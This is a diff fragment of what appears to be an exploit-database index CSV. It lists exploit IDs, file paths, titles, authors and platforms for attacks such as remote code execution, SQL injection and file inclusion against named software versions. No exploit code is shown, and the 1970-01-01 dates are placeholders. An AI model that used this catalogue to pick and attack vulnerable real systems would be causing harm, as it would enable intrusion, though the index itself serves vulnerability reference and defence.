50720,exploits/windows/remote/50720.py,"Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,notcos,remote,windows,
50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",1970-01-01,LiquidWorm,remote,hardware,
50290,exploits/multiple/remote/50290.as,"Adobe Flash Player - Integer Overflow",1970-01-01,ryujin,remote,multiple,
+50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows,
+50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44847,3 +44849,10 @@ id,file,description,date,author,type,platform,port
50772,exploits/php/webapps/50772.py,"WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50774,exploits/php/webapps/50774.txt,"FileCloud 21.2 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Masashi Fujiwara",webapps,php,
50775,exploits/hardware/webapps/50775.txt,"Dbltek GoIP - Local File Inclusion",1970-01-01,"Valtteri Lehtinen",webapps,hardware,
+50778,exploits/php/webapps/50778.txt,"Simple Real Estate Portal System 1.0 - 'id' SQLi",1970-01-01,Mosaaed,webapps,php,
+50779,exploits/php/webapps/50779.txt,"Air Cargo Management System v1.0 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
+50780,exploits/linux/webapps/50780.txt,"aaPanel 6.8.21 - Directory Traversal (Authenticated)",1970-01-01,Ghuliev,webapps,linux,
+50782,exploits/php/webapps/50782.txt,"Student Record System 1.0 - 'cid' SQLi (Authenticated)",1970-01-01,"Mohd. Anees",webapps,php,
+50784,exploits/php/webapps/50784.py,"WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
+50785,exploits/php/webapps/50785.txt,"WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
+50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php,